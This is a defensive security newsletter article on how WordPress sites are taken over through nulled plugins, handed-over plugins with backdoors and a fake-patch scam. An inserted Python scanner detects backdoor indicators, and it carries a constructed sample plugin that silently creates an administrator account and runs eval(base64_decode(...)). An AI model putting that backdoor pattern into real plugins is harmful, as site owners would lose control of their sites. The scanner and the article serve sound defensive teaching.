Security Weekly

How do WordPress sites get hacked? (Part 3)


Oliver Sild

Patchstack

Oliver Sild is the CEO and Co-founder of Patchstack. He is an entrepreneur and cyber security expert with a strong focus on community building. He has been organising hacking competitions (& local CTF community) in Estonia since 2016, has kickstarted a startup community in his hometown and has nearly 10 years of experience with WordPress security.

Week 4

In the past 2 issues, we’ve talked about the different ways websites are taken over by compromising privileged accounts and by exploiting security vulnerabilities in the WordPress core, plugins and themes.

Sometimes plugins and themes are not just vulnerable, but also intentionally malicious. This week, we’ll look into another common technique that hackers are using to take over websites.

This relies entirely on exploiting the weaknesses of human nature and is known as social engineering. Social engineering is all about psychology: tricking people into doing something that they should not be doing.

Nulled WordPress plugins and themes

A very common and widespread technique to take over websites is making people infect their own site. Hackers get their hands on a premium plugin, remove the code that is responsible for the licensing checks, and then upload the modified copy to various websites and forums for people to download for free.

Hackers have been doing this in an organised manner, publishing entire libraries of “free premium plugins”. These lists often rank well on Google, so people who are looking to download a premium plugin or theme will most likely land on one of those pages.

While those plugins/themes mostly work as expected, the underlying code has more changes to it than just the removed licence checks. They come with backdoors and malware that give the hacker complete control over the site.

One such group was called WP-VCD, who systematically published popular nulled plugins and themes for WordPress and used different websites to spread them to as many people as possible. You’ll find technical analysis on WP-VCD nulled plugins malware in the resources below.

Plugins with backdoors

There have been multiple cases where a developer has become tired of maintaining a project and hands it over to a new developer. It’s common for hackers to look for such opportunities, so they can take over the plugin and ship a backdoor with the official update.

Malicious developers can add different functions to create new admin accounts and control the website remotely. We’ve also seen cases in the past where the developer had no malicious intent, but built in a functional backdoor to provide support to the users.
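As an added illustration (this is not code from the newsletter or from Patchstack), here is a small defensive scanner for the kind of indicators described in this section and in the nulled-plugins section above: plugin code that creates user accounts or assigns the administrator role, eval() over strings that are only decoded at runtime, hard-coded remote fetches, and function names taken from request input. The two plugin sources it scans are constructed for this example; in real use you would feed it the files under wp-content/plugins and treat every hit as a lead for manual review, because legitimate plugins also create users or fetch URLs.

```python
"""Heuristic backdoor-indicator scan for WordPress plugin PHP source.

Added example, not Patchstack's code. The plugin sources at the bottom are
constructed for this illustration; hits are leads for manual review, not
proof of compromise.
"""
import re
from dataclasses import dataclass

# (indicator name, compiled pattern, why a reviewer should look at the line)
INDICATORS = [
    ("admin-account-creation",
     re.compile(r"\bwp_(?:insert|create)_user\s*\(", re.I),
     "plugin code creates WordPress user accounts"),
    ("administrator-role-assignment",
     re.compile(r"(?:set_role|add_role)\s*\(\s*['\"]administrator['\"]"
                r"|['\"]role['\"]\s*=>\s*['\"]administrator['\"]", re.I),
     "plugin code grants the administrator role"),
    ("obfuscated-eval",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "runs code that is only decoded at runtime"),
    ("remote-code-fetch",
     re.compile(r"\b(?:file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I),
     "loads content from a hard-coded remote URL"),
    ("dynamic-function-call",
     re.compile(r"\$\w+\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
     "calls a variable function name with request input"),
]


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    indicator: str
    reason: str


def scan_source(path, source):
    """Return one Finding per (line, indicator) match in a single PHP file."""
    findings = []
    for lineno, text in enumerate(source.splitlines(), start=1):
        for name, pattern, reason in INDICATORS:
            if pattern.search(text):
                findings.append(Finding(path, lineno, name, reason))
    return findings


def scan_plugin(files):
    """files maps relative path -> PHP source; paths are scanned in sorted order."""
    findings = []
    for path in sorted(files):
        findings.extend(scan_source(path, files[path]))
    return findings


def summarize(findings):
    """Indicator name -> hit count, for a quick triage view of one plugin."""
    counts = {}
    for f in findings:
        counts[f.indicator] = counts.get(f.indicator, 0) + 1
    return counts


# Constructed sample: a plugin with nothing suspicious in it.
CLEAN_PLUGIN = {
    "clean-widget/clean-widget.php": """<?php
/* Plugin Name: Clean Widget (constructed sample) */
add_action('widgets_init', function () {
    register_widget('Clean_Widget');
});
""",
}

# Constructed sample: a "nulled" premium plugin whose licence check was
# replaced with a hidden admin account plus an obfuscated loader.
NULLED_PLUGIN = {
    "premium-seo/premium-seo.php": """<?php
/* Plugin Name: Premium SEO (constructed sample, licence check removed) */
add_action('init', function () {
    if (!username_exists('wpsupport')) {
        $uid = wp_insert_user(array(
            'user_login' => 'wpsupport',
            'user_pass'  => 'changeme',
            'role'       => 'administrator',
        ));
    }
});
""",
    "premium-seo/inc/helper.php": """<?php
eval(base64_decode('<encoded payload omitted in this sample>'));
""",
}


if __name__ == "__main__":
    for label, plugin in (("clean-widget", CLEAN_PLUGIN), ("premium-seo", NULLED_PLUGIN)):
        hits = scan_plugin(plugin)
        print(f"{label}: {summarize(hits)}")
        for f in hits:
            print(f"  {f.path}:{f.line} [{f.indicator}] {f.reason}")
```

The patterns are deliberately line-based and simple so that the output is easy to explain to a site owner; a real triage pass would follow each hit back to the hook it runs under (here an `init` action that fires on every request) and compare the file against a copy obtained from the vendor.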

Scams

While nulled plugins and themes exploit the urge to save money by offering for free something you should actually be paying for, there are also scams that exploit other human emotions, such as fear.

A very good example is the recent scam that impersonated the WordPress core team and claimed that WordPress core had a critical vulnerability which needed to be manually patched with a special plugin.

While for many people it was an obvious scam, there were people, even on Reddit, who asked for public help to restore their website. It’s also important to note that many non-technical WordPress users might not even detect that the site got infected after installing the malware.

Conclusion

Hackers take advantage of well-known human emotions, both positive (such as the excitement of getting something for free) and negative (such as the fear of losing something valuable). Unfortunately, there’s no firewall you can apply to human emotions and behaviour.

There are no Robin Hoods who spend their free time and money on making premium software free for the public. They always have a reason for doing so, which comes down to what we covered in the first episode.

Always make sure to get your software only from trusted sources, and if it’s paid, please support the original developers who put their time and effort into building it. Supporting the developers also keeps them motivated, so there’s less chance the project will be handed over to the wrong hands.

PS! As a reminder, if you wish to get these episodes directly in your email, here’s a newsletter we created just for that: http://subscribepage.io/patchstack

Stay vigilant and see you next week!

Resources:

An In-Depth Analysis Of The WP-VCD Malware – Patchstack

Fake CVE Phishing Campaign Tricks WordPress Users Into Installing Malware (patchstack.com)
